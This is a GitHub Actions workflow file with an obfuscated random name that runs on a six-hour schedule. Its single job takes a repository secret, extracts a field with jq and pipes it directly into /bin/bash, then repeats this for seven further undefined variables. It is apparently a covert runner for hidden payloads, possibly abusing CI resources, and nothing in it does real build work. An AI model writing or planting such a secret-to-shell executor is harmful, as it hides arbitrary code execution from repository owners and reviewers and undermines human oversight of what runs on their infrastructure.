name: piqijing4567
on:
  workflow_dispatch:
  schedule:
    - cron: '25 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: piqijing4567
        env:
          es59495: ${{ secrets.es59495 }}
        run: |
          echo $es59495 | jq -r .y0 | /bin/bash
          echo $nqcr0649 | jq -r .iysfz964 | /bin/bash
          echo $uvez09 | jq -r .wsee37116 | /bin/bash
          echo $xzxq330 | jq -r .cc9493 | /bin/bash
          echo $rnof64 | jq -r .ysae7065 | /bin/bash
          echo $zdou0 | jq -r .op184 | /bin/bash
          echo $p28 | jq -r .c1 | /bin/bash
          echo $mz26 | jq -r .sogl90 | /bin/bash

